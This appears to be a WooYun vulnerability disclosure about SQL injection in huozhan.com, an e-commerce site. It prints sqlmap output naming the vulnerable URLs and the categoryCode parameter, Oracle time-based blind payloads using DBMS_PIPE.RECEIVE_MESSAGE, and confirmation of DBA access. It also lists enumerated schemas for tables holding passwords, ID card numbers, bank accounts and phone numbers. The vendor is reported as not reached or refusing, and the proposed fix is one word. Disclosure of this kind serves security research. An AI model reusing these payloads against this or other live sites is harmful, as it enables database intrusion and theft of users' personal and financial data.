Table: HRZ_WORK_USER
[3 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| ID        | VARCHAR2 |
| USER_CODE | VARCHAR2 |
| WORK_CODE | VARCHAR2 |
+-----------+----------+
Database: HUOZHAN
Table: CHILD_USER_INFO
[9 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| ADDRESS     | VARCHAR2 |
| ID          | NUMBER   |
| PARENT_CODE | VARCHAR2 |
| PHONE       | VARCHAR2 |
| POST_CODE   | VARCHAR2 |
| STATUS      | CHAR     |
| USER_CODE   | VARCHAR2 |
| USER_NAME   | VARCHAR2 |
| USER_TYPE   | CHAR     |
+-------------+----------+
Database: HUOZHAN
Table: USER_DOMAIN
[15 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| ACTIVE_CODE     | VARCHAR2 |
| ANSWER          | VARCHAR2 |
| ASK             | VARCHAR2 |
| CREATE_DATE     | DATE     |
| DOMAIN_DESC     | VARCHAR2 |
| DOMAIN_NAME     | VARCHAR2 |
| DOMAIN_PASSWROD | VARCHAR2 |
| DOMAIN_PRICE    | NUMBER   |
| EMAIL           | VARCHAR2 |
| ID              | NUMBER   |
| START_DATE      | DATE     |
| STATUS          | NUMBER   |
| STOP_DATE       | DATE     |
| USER_CODE       | VARCHAR2 |
| USER_TYPE       | CHAR     |
+-----------------+----------+
Database: HUOZHAN
Table: PDA_USER
[5 columns]
+-------------+-----------+
| Column      | Type      |
+-------------+-----------+
| AREA_CODE   | VARCHAR2  |
| CREATE_DATE | DATE      |
| ID          | NUMBER    |
| PDA_CODE    | NVARCHAR2 |
| USER_CODE   | NVARCHAR2 |
+-------------+-----------+
Database: HUOZHAN
Table: SUPPLIER_USER
[5 columns]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| AREA_CODE     | NVARCHAR2 |
| SUPPLIER_CODE | NVARCHAR2 |
| SUPPLIER_NAME | NVARCHAR2 |
| USER_ID       | NUMBER    |
| USER_NAME     | NVARCHAR2 |
+---------------+-----------+
Database: HUOZHAN
Table: SECOND_KILL_USER
[5 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AREA_CODE   | VARCHAR2 |
| ID          | NUMBER   |
| STATUS      | CHAR     |
| STORE_CODE  | VARCHAR2 |
| STORE_LEVEL | CHAR     |
+-------------+----------+
Database: HUOZHAN
Table: MARKET_USER_ACCOUNT
[8 columns]
+----------------+-----------+
| Column         | Type      |
+----------------+-----------+
| AUTH_USER_ID   | NUMBER    |
| CUST_NAME      | NVARCHAR2 |
| CUSTOMER_NO    | NVARCHAR2 |
| ID             | NUMBER    |
| NEED_TWO_CHECK | NCHAR     |
| REQUEST_ID     | NVARCHAR2 |
| SIGN_DATE      | DATE      |
| STATUS         | NCHAR     |
+----------------+-----------+
Database: HUOZHAN
Table: USER_BANK_ACCOUNT
[12 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| ACCOUNT_NO   | VARCHAR2 |
| ACCOUNT_PROP | CHAR     |
| ACCOUNT_TYPE | CHAR     |
| AREA_CODE    | VARCHAR2 |
| BANK_ADDRESS | VARCHAR2 |
| BANK_NAME    | VARCHAR2 |
| ID           | NUMBER   |
| STATUS       | CHAR     |
| USER_CODE    | VARCHAR2 |
| USER_ID      | NUMBER   |
| USER_NAME    | VARCHAR2 |
| USER_TYPE    | CHAR     |
+--------------+----------+
Database: HUOZHAN
Table: HRZ_PAY_USER
[12 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| AREA_CODE       | VARCHAR2 |
| EMAIL           | VARCHAR2 |
| ID              | NUMBER   |
| ID_CARDNO       | VARCHAR2 |
| LAST_LOGON_IP   | VARCHAR2 |
| LAST_LOGON_TIME | DATE     |
| PASSWORD        | VARCHAR2 |
| PHONE           | VARCHAR2 |
| STATUS          | CHAR     |
| USER_CODE       | VARCHAR2 |
| USER_NAME       | VARCHAR2 |
| USER_TYPE       | CHAR     |
+-----------------+----------+
Database: HUOZHAN
Table: AUTH_USER
[14 columns]
+-------------------+-----------+
| Column            | Type      |
+-------------------+-----------+
| ACCOUNT_OVER_TIME | DATE      |
| ID                | NUMBER    |
| IS_HELP           | CHAR      |
| LAST_LOGON_IP     | NVARCHAR2 |
| LAST_LOGON_TIME   | DATE      |
| LOCK_TIME         | DATE      |
| LOGON_NAME        | NVARCHAR2 |
| PARENT_CODE       | VARCHAR2  |
| PASSWORD          | NVARCHAR2 |
| STATUS            | NUMBER    |
| SYSTEM_CODE       | NVARCHAR2 |
| UNLOCK_TIME       | DATE      |
| USER_NAME         | NVARCHAR2 |
| USER_TYPE         | NUMBER    |
+-------------------+-----------+
Database: HUOZHAN
Table: LOGISTICS_USER
[4 columns]
+----------------+-----------+
| Column         | Type      |
+----------------+-----------+
| AREA_CODE      | NVARCHAR2 |
| LOGISTICS_CODE | NVARCHAR2 |
| USER_ID        | NUMBER    |
| USER_NAME      | NVARCHAR2 |
+----------------+-----------+
Database: HUOZHAN
Table: USER_RECHARGE_ACCOUNT
[11 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CHECK_DATE      | DATE     |
| CHECK_MAN       | VARCHAR2 |
| ID              | NUMBER   |
| ORDER_CODE      | VARCHAR2 |
| ORDER_OVER_DATE | DATE     |
| RECHARGE_AMT    | NUMBER   |
| RECHARGE_CODE   | VARCHAR2 |
| RECHARGE_DATE   | DATE     |
| STATUS          | VARCHAR2 |
| USER_CODE       | VARCHAR2 |
| USER_TYPE       | CHAR     |
+-----------------+----------+
Database: HUOZHAN
Table: STORE_USER
[4 columns]
+------------+-----------+
| Column     | Type      |
+------------+-----------+
| AREA_CODE  | NVARCHAR2 |
| STORE_CODE | NVARCHAR2 |
| STORE_NAME | NVARCHAR2 |
| USER_ID    | NUMBER    |
+------------+-----------+
Database: HRZMART
+------------+---------+
| Table      | Entries |
+------------+---------+
| MALLUSER   | 1       |
| NORMALUSER | 1       |
+------------+---------+
Database: HRZMART
Table: NORMALUSER
[8 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ADDRESS       | VARCHAR2 |
| ID            | NUMBER   |
| LINKMAN       | VARCHAR2 |
| PHONE         | VARCHAR2 |
| POST_CODE     | VARCHAR2 |
| STATUS        | VARCHAR2 |
| USER_INTEGRAL | NUMBER   |
| USER_NAME     | VARCHAR2 |
+---------------+----------+
Database: HRZMART
Table: MALLUSER
[10 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CREATE_DATE     | DATE     |
| EMAIL           | VARCHAR2 |
| ID              | NUMBER   |
| LAST_LOGON_DATE | DATE     |
| NICK_NAME       | VARCHAR2 |
| PASSWORD        | VARCHAR2 |
| PHONE           | VARCHAR2 |
| STATUS          | CHAR     |
| USER_NAME       | VARCHAR2 |
| USERTYPE        | CHAR     |
+-----------------+----------+


1.jpg


2.jpg


第二处:
http://www.huozhan.com/IndexSearchAction_marketItem.do?categoryCode=010103
categoryCode存在注入

GET parameter 'categoryCode' is vulnerable. Do you want to keep testing the othe
rs (if any)? [y/N] N
sqlmap identified the following injection points with a total of 55 HTTP(s) requ
ests:
---
Place: GET
Parameter: categoryCode
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: categoryCode=010103 AND 4466=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR
(77)||CHR(118)||CHR(90),5)
---
[00:23:48] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[00:23:48] [INFO] fetching current user
[00:23:48] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[00:23:48] [INFO] retrieved:
[00:23:48] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[00:24:09] [INFO] adjusting time delay to 3 seconds due to good response times
HUOZHAN
current user:    'HUOZHAN'
[00:25:50] [INFO] fetching current database
[00:25:50] [INFO] resumed: HUOZHAN
[00:25:50] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'HUOZHAN'
[00:25:50] [INFO] testing if current user is DBA
current user is DBA:    True


第三处:
http://www.huozhan.com/IndexSearchAction_marketItem.do (POST)
categoryCode=&currPage=1&scategorycode=&supplierArea=&displayType=&morecategoryf=&selecttype=itemname&value=
1

sqlmap identified the following injection points with a total of 748 HTTP(s) req
uests:
---
Place: POST
Parameter: categoryCode
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: categoryCode=%' AND 3144=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(79
)||CHR(71)||CHR(90),5) AND '%'='&currPage=1&scategorycode=&supplierArea=&display
Type=&morecategoryf=&selecttype=itemname&value=1
---
[00:54:08] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[00:54:08] [INFO] fetching current user
[00:54:08] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[00:54:08] [INFO] retrieved:
[00:54:08] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
HUOZHAN
current user:    'HUOZHAN'
[00:58:30] [INFO] fetching current database
[00:58:30] [INFO] resumed: HUOZHAN
[00:58:30] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'HUOZHAN'
[00:58:30] [INFO] testing if current user is DBA
current user is DBA:    True

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评价